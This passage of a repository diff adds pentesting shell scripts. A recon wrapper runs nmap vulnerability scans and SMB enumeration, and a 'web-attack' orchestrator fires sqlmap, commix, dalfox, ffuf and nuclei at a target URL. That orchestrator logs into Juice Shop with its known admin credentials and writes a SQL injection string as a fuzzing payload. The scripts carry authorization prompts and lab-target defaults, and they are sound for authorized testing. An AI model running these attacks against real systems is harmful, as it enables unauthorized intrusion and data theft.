  echo "  payload lfi windows        - Windows LFI/path traversal"
  echo
  echo -e "${YELLOW}Other:${NC}"
  echo "  payload xxe                - XML external entity"
  echo "  payload ssti               - Server-side template injection"
}
|
||||
|
||||
# Main logic: dispatch the first argument to a generator function and
# forward the remaining arguments (variant, host, port) untouched.
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

type="$1"
shift

case "$type" in
  list|ls)
    list_payloads
    ;;
  sql)
    generate_sql "$@"
    ;;
  xss)
    generate_xss "$@"
    ;;
  cmd|command)
    generate_cmd "$@"
    ;;
  shell|shells)
    generate_shell "$@"
    ;;
  lfi)
    generate_lfi "$@"
    ;;
  xxe)
    generate_xxe
    ;;
  ssti|template)
    generate_ssti
    ;;
  *)
    echo -e "${RED}Error:${NC} Unknown payload type: $type"
    echo "Run 'payload list' to see available types"
    exit 1
    ;;
esac
|
||||
196
scripts/pentesting/recon
Executable file
196
scripts/pentesting/recon
Executable file
|
|
@ -0,0 +1,196 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: recon.sh
|
||||
# Description: Network/host reconnaissance with tmux orchestration
|
||||
# Usage: recon <target>
|
||||
# Creates tmux window with parallel nmap scans and enum4linux
|
||||
|
||||
VERSION="2.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
# Print usage, pane layout description, examples and output location for
# the `recon` script. Writes to stdout; no side effects.
show_help() {
  echo -e "${BOLD}recon${NC} - Network Reconnaissance Script v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo "  recon <target>"
  echo
  echo -e "${BOLD}DESCRIPTION:${NC}"
  echo "  Creates tmux window with 3 panes running parallel reconnaissance:"
  echo "  - Pane 1: nmap service scan + version detection"
  echo "  - Pane 2: nmap vulnerability scan + full port scan"
  echo "  - Pane 3: enum4linux-ng (SMB enumeration)"
  echo
  echo -e "${BOLD}EXAMPLE:${NC}"
  echo "  recon 10.10.10.5"
  echo "  recon target.htb"
  echo
  echo -e "${BOLD}OUTPUT:${NC}"
  echo "  All results saved to: ./recon-<target>-<timestamp>/"
}
|
||||
|
||||
# Check required tools
|
||||
# Verify external tools for recon.
# Required (nmap, tmux): exit 1 with an install hint if missing.
# Optional (naabu, docker): warn only; the affected steps degrade or skip.
check_tools() {
  local missing=()

  command -v nmap &>/dev/null || missing+=("nmap")
  command -v tmux &>/dev/null || missing+=("tmux")

  # Optional tools
  if ! command -v naabu &>/dev/null; then
    echo -e "${YELLOW}⚠${NC} naabu not found (optional - using pure nmap)"
  fi

  if ! command -v docker &>/dev/null; then
    echo -e "${YELLOW}⚠${NC} docker not found (skipping enum4linux-ng)"
  fi

  if [[ ${#missing[@]} -gt 0 ]]; then
    echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
    echo "Install with: sudo apt install ${missing[*]}"
    exit 1
  fi
}
|
||||
|
||||
# Create output directory
|
||||
# Create a timestamped results directory for this target and publish its
# name via the global OUTPUT_DIR (recon-<sanitized-target>-<timestamp>).
# Arguments: $1 - target host/CIDR; '/' and ':' are mapped to '_'.
setup_output_dir() {
  local target="$1"
  local stamp sanitized
  stamp=$(date +%Y%m%d-%H%M%S)
  sanitized=$(printf '%s' "$target" | tr '/:' '_')

  OUTPUT_DIR="recon-${sanitized}-${stamp}"
  mkdir -p "$OUTPUT_DIR"

  echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# Main recon function
|
||||
# Orchestrate network reconnaissance against a target.
# Inside tmux, builds a 3-pane window running nmap service/vuln/full-port
# scans (via naabu when available) and enum4linux-ng (via docker when
# available) in parallel; outside tmux, falls back to sequential scans.
# Globals:   OUTPUT_DIR (set via setup_output_dir), TMUX (read).
# Arguments: $1 - target host or hostname.
run_recon() {
  local target="$1"

  echo -e "${CYAN}${BOLD}"
  echo "╔════════════════════════════════════════════════════════════╗"
  echo "║              Network Reconnaissance                        ║"
  echo "║  Target: $target"
  echo "╚════════════════════════════════════════════════════════════╝"
  echo -e "${NC}"

  # Create output directory
  setup_output_dir "$target"

  # Check if in tmux; outside a session run the scans one by one.
  if [[ -z "${TMUX:-}" ]]; then
    echo -e "${YELLOW}⚠${NC} Not in tmux session - results will be in terminal"
    run_scans_sequential "$target"
    return
  fi

  # Create tmux window
  tmux new-window -n "<<Recon: $target>>"

  # Split into 3 panes
  # Bottom pane (pane 0)
  tmux split-window -v

  # Top left pane (pane 1)
  tmux select-pane -t 0
  tmux split-window -h

  # Top right pane (pane 2)
  tmux select-pane -t 1
  tmux split-window -h

  # Pane 0 (bottom): Quick scan + detailed scan
  # Each branch prefers naabu (fast port discovery feeding nmap) and
  # falls back to plain nmap when naabu is absent.
  tmux select-pane -t 0
  if command -v naabu &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting quick port discovery with naabu...${NC}' && naabu -host $target -nmap-cli 'nmap -A -T4 -oA nmap_quick' && echo -e '\n${GREENSTAR} Starting detailed scan...${NC}\n' && naabu -host $target -nmap-cli 'nmap -sV -sC -Pn -oN nmap_detailed'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nmap scan...${NC}' && nmap -sV -sC -T4 -oA nmap_quick $target && echo -e '\n${GREENSTAR} Starting detailed scan...${NC}\n' && nmap -sV -sC -Pn -oN nmap_detailed $target" C-m
  fi

  # Pane 1 (top left): Vulnerability scan + full port scan
  tmux select-pane -t 1
  if command -v naabu &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting vulnerability scan...${NC}' && naabu -host $target -nmap-cli 'nmap --script vuln -Pn -oN nmap_vuln' && echo -e '\n${GREENSTAR} Starting full port scan (all 65535)...${NC}\n' && nmap -p- -T4 $target -oN nmap_fullports" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting vulnerability scan...${NC}' && nmap --script vuln -Pn -oN nmap_vuln $target && echo -e '\n${GREENSTAR} Starting full port scan...${NC}\n' && nmap -p- -T4 $target -oN nmap_fullports" C-m
  fi

  # Pane 2 (top right): enum4linux-ng
  tmux select-pane -t 2
  if command -v docker &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting enum4linux-ng (SMB enumeration)...${NC}' && docker run --rm -t enum4linux-ng -A -C $target -oY enum4linux-ng.yaml | tee enum4linux-ng.txt" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ Docker not available - skipping enum4linux-ng${NC}' && echo 'Install docker to enable SMB enumeration' && sleep 5" C-m
  fi

  # Focus back on bottom pane
  tmux select-pane -t 0

  echo
  echo -e "${GREEN}✓${NC} Tmux recon window created"
  echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}<<Recon: $target>>${NC}"
  echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
# Sequential fallback used when not inside tmux: service scan, vuln scan
# and (if docker is available) enum4linux-ng, one after another.
# Globals:   OUTPUT_DIR (read) - directory created by setup_output_dir.
# Arguments: $1 - target host.
run_scans_sequential() {
  local target="$1"

  cd "$OUTPUT_DIR"

  echo -e "\n${GREENSTAR} Running nmap service scan...${NC}"
  # Prefer naabu-driven port discovery; fall back to plain nmap.
  if command -v naabu &>/dev/null; then
    naabu -host "$target" -nmap-cli 'nmap -sV -sC -T4 -oA nmap_quick'
  else
    nmap -sV -sC -T4 -oA nmap_quick "$target"
  fi

  echo -e "\n${GREENSTAR} Running vulnerability scan...${NC}"
  nmap --script vuln -Pn -oN nmap_vuln "$target"

  if command -v docker &>/dev/null; then
    echo -e "\n${GREENSTAR} Running enum4linux-ng...${NC}"
    docker run --rm -t enum4linux-ng -A -C "$target" -oY enum4linux-ng.yaml | tee enum4linux-ng.txt
  fi

  # OUTPUT_DIR is a single-level relative path, so `cd ..` restores the
  # original working directory.
  cd ..

  echo -e "\n${GREEN}✓${NC} Recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# --- Entry point ---------------------------------------------------------
# Parse arguments: no arguments or a help flag prints usage and exits.
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

target="$1"

# Validate target (guards against an explicit empty-string argument).
if [[ -z "$target" ]]; then
  echo -e "${RED}Error:${NC} Target required"
  echo "Usage: recon <target>"
  exit 1
fi

# Check tools (exits if nmap/tmux are missing).
check_tools

# Run reconnaissance
run_recon "$target"
|
||||
460
scripts/pentesting/web-attack
Executable file
460
scripts/pentesting/web-attack
Executable file
|
|
@ -0,0 +1,460 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: web-attack
# Description: Web application OWASP Top 10 exploitation testing
# Usage: web-attack <url>

# Script version; readonly for consistency with the constants below.
readonly VERSION="1.0.0"

# Colors (ANSI escape sequences, rendered via `echo -e`)
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Status indicators used as message prefixes throughout the script
readonly GREENPLUS="${GREEN}[+]${NC}"
readonly GREENSTAR="${YELLOW}[*]${NC}"
readonly REDMINUS="${RED}[-]${NC}"
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
# Print usage, the authorization policy, the tests performed, and the
# recommended recon-then-attack workflow to stdout. Formatting codes come
# from the readonly color globals defined at the top of the script.
# NOTE(review): several lines below use plain `echo` (no -e) while embedding
# ${GREEN}/${YELLOW}/${BOLD}; those escape sequences will print literally —
# confirm whether `echo -e` was intended.
show_help() {
    echo -e "${BOLD}web-attack${NC} - OWASP Top 10 Exploitation Testing v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo "  web-attack <url>"
    echo
    echo -e "${BOLD}DESCRIPTION:${NC}"
    echo "  Active exploitation testing for OWASP Top 10 vulnerabilities"
    echo "  Creates tmux window with 6 panes running parallel attacks"
    echo
    echo -e "${BOLD}⚠️ AUTHORIZATION REQUIRED ⚠️${NC}"
    echo -e "  ${RED}Only use on:${NC}"
    echo "  ✓ localhost/127.0.0.1 (your own systems)"
    echo "  ✓ Authorized penetration testing targets"
    echo "  ✓ Bug bounty programs (within scope)"
    echo "  ✓ Lab environments (DVWA, Juice Shop, etc.)"
    echo
    echo "  ✗ NEVER use on unauthorized targets"
    echo "  ✗ Illegal without explicit permission"
    echo
    echo -e "${BOLD}TESTS PERFORMED:${NC}"
    echo "  1. SQL Injection (sqlmap)"
    echo "  2. XSS Detection (dalfox)"
    echo "  3. Command Injection (commix)"
    echo "  4. XXE / SSRF Testing"
    echo "  5. Authentication Bypass"
    echo "  6. LFI/RFI Testing"
    echo
    echo -e "${BOLD}RECOMMENDED WORKFLOW:${NC}"
    echo "  ${GREEN}1.${NC} Run reconnaissance first:"
    echo "     ${BOLD}web-recon http://localhost:3002${NC}"
    echo "     (Discovers endpoints, forms, parameters)"
    echo
    echo "  ${GREEN}2.${NC} Then run exploitation:"
    echo "     ${BOLD}web-attack http://localhost:3002${NC}"
    echo "     (Tests discovered attack surface)"
    echo
    echo "  ${YELLOW}⚠${NC} Running web-attack alone will find fewer vulnerabilities"
    echo "  ${YELLOW}⚠${NC} Tools need discovered endpoints/parameters for best results"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo "  web-attack http://localhost:3002"
    echo "  web-attack http://localhost:8080  # DVWA"
    echo
    echo -e "${BOLD}OUTPUT:${NC}"
    echo "  All results saved to: ./web-attack-<target>-<timestamp>/"
    echo
    echo -e "${BOLD}SAFETY FEATURES:${NC}"
    echo "  • Localhost check (warns for non-local targets)"
    echo "  • Rate limiting (--throttle)"
    echo "  • No destructive payloads by default"
    echo "  • PoC-focused (prove vulnerability, don't exploit)"
}
|
||||
|
||||
# Authorization check
#######################################
# Gate execution on target authorization. Localhost and CTF (.htb/.thm)
# targets pass automatically; anything else requires the user to type YES
# at an interactive prompt, otherwise the script exits.
# Arguments: $1 - target URL
# Returns:   0 when authorized; exits 1 when the user declines
#######################################
check_authorization() {
    local url="$1"

    # Extract hostname (strip scheme, then port, then path)
    local hostname
    hostname=$(echo "$url" | sed -E 's~https?://~~' | cut -d: -f1 | cut -d/ -f1)

    # Check if localhost.
    # BUG FIX: the previous regexes used doubled backslashes (127\\.0\\.0\\.1),
    # which inside [[ =~ ]] match a literal backslash followed by any char, so
    # 127.0.0.1 (and *.htb/*.thm below) never matched and were sent to the
    # interactive prompt instead of auto-authorizing.
    if [[ "$hostname" =~ ^(localhost|127\.0\.0\.1|0\.0\.0\.0)$ ]]; then
        echo -e "${GREEN}✓${NC} Target is localhost - authorized"
        return 0
    fi

    # Check if HTB/THM/CTF
    if [[ "$hostname" =~ \.(htb|thm)$ ]]; then
        echo -e "${GREEN}✓${NC} Target is CTF platform - authorized"
        return 0
    fi

    # Warn for external targets
    echo -e "${RED}⚠️ WARNING:${NC} Target is NOT localhost!"
    echo -e "${YELLOW}Target:${NC} $hostname"
    echo
    echo -e "${BOLD}Do you have written authorization to test this target?${NC}"
    echo "  • Signed penetration testing agreement?"
    echo "  • Bug bounty program with this target in scope?"
    echo "  • Own the target infrastructure?"
    echo
    read -p "Type 'YES' to confirm authorization: " -r confirm

    if [[ "$confirm" != "YES" ]]; then
        echo -e "${RED}Authorization not confirmed. Exiting.${NC}"
        exit 1
    fi

    echo -e "${GREEN}✓${NC} Authorization confirmed by user"
}
|
||||
|
||||
# Check required tools
# tmux is a hard requirement; the attack tools are optional — missing ones
# only cause their scans to be skipped, with install hints printed.
check_tools() {
    local missing=()
    local optional_missing=()
    local tool

    # Core tools
    if ! command -v tmux &>/dev/null; then
        missing+=("tmux")
    fi

    # Attack tools (all optional but warn) — order preserved for output
    for tool in sqlmap dalfox nuclei ffuf commix; do
        if ! command -v "$tool" &>/dev/null; then
            optional_missing+=("$tool")
        fi
    done

    if (( ${#missing[@]} > 0 )); then
        echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
        exit 1
    fi

    if (( ${#optional_missing[@]} > 0 )); then
        echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
        echo -e "${CYAN}Install with:${NC}"
        for tool in "${optional_missing[@]}"; do
            case "$tool" in
                sqlmap) echo "  sudo apt install sqlmap (or: pipx install sqlmap-dev)" ;;
                dalfox) echo "  go install github.com/hahwul/dalfox/v2@latest" ;;
                nuclei) echo "  go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
                ffuf) echo "  go install github.com/ffuf/ffuf/v2@latest" ;;
                commix) echo "  pipx install commix" ;;
            esac
        done
        echo
    fi
}
|
||||
|
||||
# Create output directory
# Find most recent web-recon data for this target
#######################################
# Locate the newest web-recon output directory for this target that is less
# than 24 hours old and contains a urls.txt.
# Arguments: $1 - target URL
# Outputs:   directory name on stdout when found
# Returns:   0 when usable recon data exists, 1 otherwise
#######################################
find_recon_data() {
    local url="$1"
    local clean_url
    # NB: `tr -d 'http'` deletes the characters h/t/p anywhere in the string
    # (not the literal prefix); kept as-is so the name keeps matching the
    # directories produced by web-recon, which uses the same transform.
    clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')

    # Look for web-recon directories matching this target (most recent first)
    local recon_dir
    recon_dir=$(ls -dt web-recon-*"${clean_url}"* 2>/dev/null | head -1)

    if [[ -n "$recon_dir" ]] && [[ -f "$recon_dir/urls.txt" ]]; then
        # Check if recon data is recent (within last 24 hours).
        # Declaration and assignment are split so a stat failure is not
        # masked by `local`, and an empty result is guarded before the
        # arithmetic below (the original crashed on an empty $recon_age).
        local recon_age
        recon_age=$(stat -c %Y "$recon_dir" 2>/dev/null || stat -f %m "$recon_dir" 2>/dev/null) || recon_age=""
        if [[ -n "$recon_age" ]]; then
            local current_time age_hours
            current_time=$(date +%s)
            age_hours=$(( (current_time - recon_age) / 3600 ))

            if (( age_hours < 24 )); then
                echo "$recon_dir"
                return 0
            fi
        fi
    fi

    return 1
}
|
||||
|
||||
#######################################
# Create the web-attack output directory tree and import fresh web-recon URL
# data when available.
# Globals:   OUTPUT_DIR, RECON_DIR, RECON_URLS (written)
# Arguments: $1 - target URL
#######################################
setup_output_dir() {
    local url="$1"
    local timestamp clean_url
    timestamp=$(date +%Y%m%d-%H%M%S)
    clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')

    OUTPUT_DIR="web-attack-${clean_url}-${timestamp}"
    mkdir -p "$OUTPUT_DIR"
    mkdir -p "$OUTPUT_DIR/sqlmap"
    mkdir -p "$OUTPUT_DIR/commix"

    echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"

    # Default so RECON_URLS is always set (the original could leave it unset
    # when recon data existed but urls.txt was empty — a `set -u` hazard).
    RECON_URLS=""

    # Check for recent web-recon data.
    # BUG FIX: find_recon_data returns 1 when nothing is found; assigning its
    # output directly aborted the whole script under `set -e` before the
    # "no recon data" fallback below could run. Guard the assignment.
    RECON_DIR=$(find_recon_data "$url") || RECON_DIR=""
    if [[ -n "$RECON_DIR" ]]; then
        echo -e "${CYAN}[*]${NC} Found recent recon data: ${BOLD}$RECON_DIR${NC}"

        # Copy recon URLs for exploitation tools
        if [[ -f "$RECON_DIR/urls.txt" ]] && [[ -s "$RECON_DIR/urls.txt" ]]; then
            cp "$RECON_DIR/urls.txt" "$OUTPUT_DIR/recon-urls.txt"
            local url_count
            url_count=$(wc -l < "$OUTPUT_DIR/recon-urls.txt")
            echo -e "${GREEN}✓${NC} Imported ${BOLD}${url_count} URLs${NC} from web-recon for testing"
            RECON_URLS="$OUTPUT_DIR/recon-urls.txt"
        fi
    else
        echo -e "${YELLOW}⚠${NC} No recent web-recon data - tools will use deep crawl mode"
        echo -e "${CYAN}Tip:${NC} Run ${BOLD}web-recon $url${NC} first for better results"
        RECON_URLS=""
    fi
}
|
||||
|
||||
# Attempt to get authentication token for Juice Shop
#######################################
# Log in to a local OWASP Juice Shop with its well-known admin credentials
# and capture the JWT so the attack tools can send authenticated requests.
# Globals:   AUTH_TOKEN (written; empty string on failure)
# Arguments: $1 - target URL
# Returns:   0 when a token was obtained, 1 otherwise
#######################################
get_juice_shop_auth() {
    local url="$1"

    # Check if this is Juice Shop (localhost:3002)
    if [[ ! "$url" =~ localhost:3002 ]]; then
        return 1
    fi

    echo -e "${CYAN}[*]${NC} Detected Juice Shop - attempting authentication..."

    # Login and extract JWT token. Declaration and assignment are split so a
    # curl failure is not masked by `local` (which always returns 0), and
    # guarded so a connection error does not abort under `set -e`.
    local response
    response=$(curl -s -X POST "${url}/rest/user/login" \
        -H "Content-Type: application/json" \
        -d '{"email":"admin@juice-sh.op","password":"admin123"}' 2>/dev/null) || response=""

    if [[ -z "$response" ]]; then
        echo -e "${YELLOW}⚠${NC} Could not connect to Juice Shop login endpoint"
        return 1
    fi

    # Extract token from response; guard so a missing jq (or malformed JSON)
    # doesn't kill the script under set -e / pipefail.
    AUTH_TOKEN=$(echo "$response" | jq -r '.authentication.token' 2>/dev/null) || AUTH_TOKEN=""

    if [[ -n "$AUTH_TOKEN" ]] && [[ "$AUTH_TOKEN" != "null" ]]; then
        echo -e "${GREEN}✓${NC} Successfully authenticated as admin@juice-sh.op"
        echo -e "${CYAN}[*]${NC} JWT token obtained (will be used by all tools)"
        return 0
    else
        echo -e "${YELLOW}⚠${NC} Authentication failed - continuing without auth"
        AUTH_TOKEN=""
        return 1
    fi
}
|
||||
|
||||
# Main web-attack function
#######################################
# Orchestrate the full attack run: normalize the URL, confirm authorization,
# prepare the output directory, try Juice Shop auth, then launch six attack
# tools in parallel tmux panes (or sequentially when not inside tmux).
# Globals:   OUTPUT_DIR, RECON_URLS (read, set by setup_output_dir);
#            AUTH_TOKEN (written/exported); color constants (read)
# Arguments: $1 - target URL (scheme optional; http:// is assumed)
#######################################
run_web_attack() {
    local url="$1"

    # Ensure URL has http:// or https://
    if [[ ! "$url" =~ ^https?:// ]]; then
        url="http://$url"
        echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
    fi

    echo -e "${RED}${BOLD}"
    echo "╔════════════════════════════════════════════════════════════╗"
    echo "║ ⚠️ ACTIVE EXPLOITATION TESTING ⚠️ ║"
    echo "║ Target: $url"
    echo "║ AUTHORIZATION REQUIRED - LEGAL USE ONLY ║"
    echo "╚════════════════════════════════════════════════════════════╝"
    echo -e "${NC}"

    # Authorization check
    check_authorization "$url"

    # Create output directory
    setup_output_dir "$url"

    # Attempt Juice Shop authentication.
    # BUG FIX: get_juice_shop_auth returns 1 for any non-Juice-Shop target,
    # which aborted the whole script here under `set -e`; tolerate failure.
    export AUTH_TOKEN=""
    get_juice_shop_auth "$url" || true

    # Check if in tmux
    if [[ -z "${TMUX:-}" ]]; then
        echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
        run_attacks_sequential "$url"
        return
    fi

    # Create tmux window with 6 panes
    tmux new-window -n "--> ATTACK: ${url:0:15}... <--"

    # Create 3x2 grid (6 panes total)
    # CRITICAL: Tmux renumbers panes during splits, pane 0 disappears
    # Strategy: Create 3 columns first, then split each vertically
    # Final layout:
    # [1: sqlmap] [3: dalfox] [5: nuclei]
    # [2: commix] [4: ffuf] [6: manual]

    # Create 3 columns (horizontal splits)
    tmux split-window -h
    tmux split-window -h

    # Select leftmost pane and split vertically (creates bottom-left)
    tmux select-pane -t 0
    tmux split-window -v

    # Select middle pane and split vertically (creates bottom-middle)
    tmux select-pane -t 2
    tmux split-window -v

    # Select rightmost pane and split vertically (creates bottom-right)
    tmux select-pane -t 4
    tmux split-window -v

    # Note: tmux 'tiled' layout may choose 2x3 or 3x2 depending on terminal size
    # Current result: 2 columns x 3 rows (vertical orientation)
    # Both layouts work fine - tmux optimizes based on available space
    tmux select-layout tiled

    # Final pane numbering after tiled layout:
    # If 2x3 (2 columns, 3 rows):    If 3x2 (3 columns, 2 rows):
    # 1 4                            1 3 5
    # 2 5                            2 4 6
    # 3 6

    # NOTE(review): new panes take their environment from the tmux *server*,
    # not this client process, so the \$AUTH_TOKEN references embedded in the
    # send-keys strings below may expand empty inside the panes even when a
    # token was captured here — confirm with `tmux show-environment`.

    # Pane 1 (top-left): SQLMap (SQL injection)
    tmux select-pane -t 1
    if command -v sqlmap &>/dev/null; then
        # Use recon URLs if available, otherwise deep crawl
        # Rate-limited: 1 thread, 2 second delay to prevent target crash
        # Add JWT auth header if available (using proper escaping for tmux send-keys)
        if [[ -n "$AUTH_TOKEN" ]]; then
            if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
                local url_count=$(wc -l < "$RECON_URLS")
                tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Testing ${url_count} URLs from web-recon (authenticated)...${NC}' && sqlmap -m recon-urls.txt --batch --level=2 --risk=2 --threads=1 --delay=2 --forms --headers='Authorization: Bearer \$AUTH_TOKEN' -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
            else
                tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Deep crawl mode (no recon data)...${NC}' && sqlmap -u '$url' --batch --crawl=2 --level=2 --risk=2 --threads=1 --delay=2 --forms --headers='Authorization: Bearer \$AUTH_TOKEN' -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
            fi
        else
            if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
                local url_count=$(wc -l < "$RECON_URLS")
                tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Testing ${url_count} URLs from web-recon...${NC}' && sqlmap -m recon-urls.txt --batch --level=2 --risk=2 --threads=1 --delay=2 --forms -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
            else
                tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Deep crawl mode (no recon data)...${NC}' && sqlmap -u '$url' --batch --crawl=2 --level=2 --risk=2 --threads=1 --delay=2 --forms -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
            fi
        fi
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ sqlmap not installed - skipping${NC}'" C-m
    fi

    # Pane 2 (bottom-left): Commix (command injection)
    tmux select-pane -t 2
    if command -v commix &>/dev/null; then
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Commix: Command injection testing...${NC}' && timeout 120 commix -u '$url' --batch --crawl=2 --output-dir=commix 2>&1 | tee commix.log || echo 'Commix timeout or no vulns' && echo -e '${GREEN}✓ Commix complete${NC}'" C-m
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ commix not installed - skipping${NC}'" C-m
    fi

    # Pane 3 (top-middle): Dalfox (XSS detection)
    tmux select-pane -t 3
    if command -v dalfox &>/dev/null; then
        # Use recon URLs if available for better XSS detection
        # Rate-limited: 200ms delay between requests (balanced speed/safety)
        # Add JWT auth header if available (using proper escaping for tmux send-keys)
        if [[ -n "$AUTH_TOKEN" ]]; then
            if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
                local url_count=$(wc -l < "$RECON_URLS")
                tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Testing ${url_count} URLs from web-recon (authenticated)...${NC}' && dalfox file recon-urls.txt --delay=200 --follow-redirects -w 3 -H 'Authorization: Bearer \$AUTH_TOKEN' -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
            else
                tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Crawler mode (no recon data)...${NC}' && dalfox url '$url' --delay=200 --follow-redirects --crawler-mode -w 3 -H 'Authorization: Bearer \$AUTH_TOKEN' -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
            fi
        else
            if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
                local url_count=$(wc -l < "$RECON_URLS")
                tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Testing ${url_count} URLs from web-recon...${NC}' && dalfox file recon-urls.txt --delay=200 --follow-redirects -w 3 -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
            else
                tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Crawler mode (no recon data)...${NC}' && dalfox url '$url' --delay=200 --follow-redirects --crawler-mode -w 3 -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
            fi
        fi
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ dalfox not installed - skipping${NC}'" C-m
    fi

    # Pane 4 (bottom-middle): FFUF (parameter fuzzing)
    tmux select-pane -t 4
    if command -v ffuf &>/dev/null; then
        # Check if payload script exists
        if command -v payload &>/dev/null; then
            tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} FFUF: Parameter fuzzing with payloads...${NC}' && payload sqli basic > sqli.txt && payload xss basic > xss.txt && echo 'admin' > users.txt && echo 'password' >> users.txt && ffuf -u '$url?id=FUZZ' -w sqli.txt -mc 200,500 -o ffuf-sqli.json 2>&1 | head -50 && echo -e '${GREEN}✓ FFUF complete${NC}'" C-m
        else
            tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ payload script not found - basic ffuf only${NC}' && echo \"' OR '1'='1\" > payloads.txt && ffuf -u '$url?id=FUZZ' -w payloads.txt -mc 200,500 2>&1 | head -50" C-m
        fi
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ ffuf not installed - skipping${NC}'" C-m
    fi

    # Pane 5 (top-right): Nuclei (exploit templates only)
    tmux select-pane -t 5
    if command -v nuclei &>/dev/null; then
        # Rate-limited: 10 requests/second, stagger start by 6 seconds
        # Add JWT auth header if available (using proper escaping for tmux send-keys)
        if [[ -n "$AUTH_TOKEN" ]]; then
